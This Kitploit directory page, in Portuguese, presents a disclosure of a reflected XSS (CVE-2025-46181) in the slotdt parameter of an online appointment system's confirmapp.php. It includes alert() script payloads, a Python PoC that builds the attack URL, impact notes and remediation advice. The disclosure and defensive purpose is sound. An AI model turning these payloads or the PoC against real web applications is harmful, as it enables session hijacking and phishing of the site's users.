Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-46181-XSS — Divulgação de vulnerabilidade de XSS refletido com script PoC e orientação de remediação para um sistema de agendamento de consultas online. Inclui análise de parâmetros vulneráveis e avaliação de impacto. | Kitploit
Ferramentas/GitHubGitHub/shemkumar/cve-2025-46181-xss
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebSegurança WebTestes de PenetraçãoAprendizado e Educação
GitHubshemkumar/cve-2025-46181-xss

CVE-2025-46181-XSS

Divulgação de vulnerabilidade de XSS refletido com script PoC e orientação de remediação para um sistema de agendamento de consultas online. Inclui análise de parâmetros vulneráveis e avaliação de impacto.

Ver Repositório
há 1 anoAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2025-46181 - XSS Refletido em um Sistema de Agendamento Online

CVE-ID: CVE-2025-46181
Descoberto por: Shemkumar P (shemkumar.github.io)
Tipo de Vulnerabilidade: Cross-Site Scripting Refletido (XSS)
Severidade: Média
Status: Divulgado, CVE Atribuído pelo MITRE


✨ Descrição

Uma vulnerabilidade de Cross-Site Scripting Refletido (XSS) existe em um sistema público de agendamento online (v1.0), especificamente na página que lida com a confirmação de agendamentos. Um parâmetro GET não sanitiza a entrada adequadamente, permitindo a injeção de JavaScript e execução de código no navegador da vítima.


📍 Parâmetro Vulnerável

root@kitploit:~
GET /confirmapp.php?slotdt=<payload>

Exemplo de Payload (Codificado):

root@kitploit:~
<script>alert("XSS")</script>

💥 Prova de Conceito (PoC)

root@kitploit:~
<script>alert("You have been hijacked")</script>

🚫 Link ao vivo ocultado por razões éticas. Esta vulnerabilidade foi testada em um ambiente controlado.


⚙️ Script Python de PoC

root@kitploit:~
import requests
from urllib.parse import quote

base_url = "https://[REDACTED]/confirmapp.php"
payload = '<script>alert("XSS triggered")</script>'

params = {
    'fullname': 'test',
    'mobile': '9999999999',
    'emailid': '[email protected]',
    'slotdt': payload,
    'slottime': '11:00:00',
    'doctorid': '2'
}

encoded = '&'.join(f"{k}={quote(str(v))}" for k, v in params.items())
print("Test URL (use only in authorized test environments):")
print(f"{base_url}?{encoded}")

🛡️ Impacto

  • Execução arbitrária de JavaScript
  • Potencial sequestro de sessão
  • Clickjacking ou redirecionamento de phishing
  • Ataques direcionados através de links maliciosos

🧪 Remediação

A aplicação deve:

  • Escapar entradas do usuário usando htmlspecialchars() em PHP
  • Usar uma Política de Segurança de Conteúdo (CSP)
  • Sanitizar dados do usuário tanto no lado do cliente quanto no servidor

📜 Linha do Tempo

  • Descoberta: Maio de 2025
  • CVE Atribuído pelo MITRE: Junho de 2025
  • Divulgação Pública: Junho de 2025

🧑‍💻 Autor

Shemkumar P
🕸️ shemkumar.github.io
🔐 Pesquisador de Cibersegurança | Entusiasta de CTF | Repórter de CVE


⚠️ Esta publicação é apenas para uso educacional e defensivo. Testar ou explorar vulnerabilidades em sistemas que você não possui ou para os quais não tem permissão explícita é ilegal e antiético.

Baixar ferramenta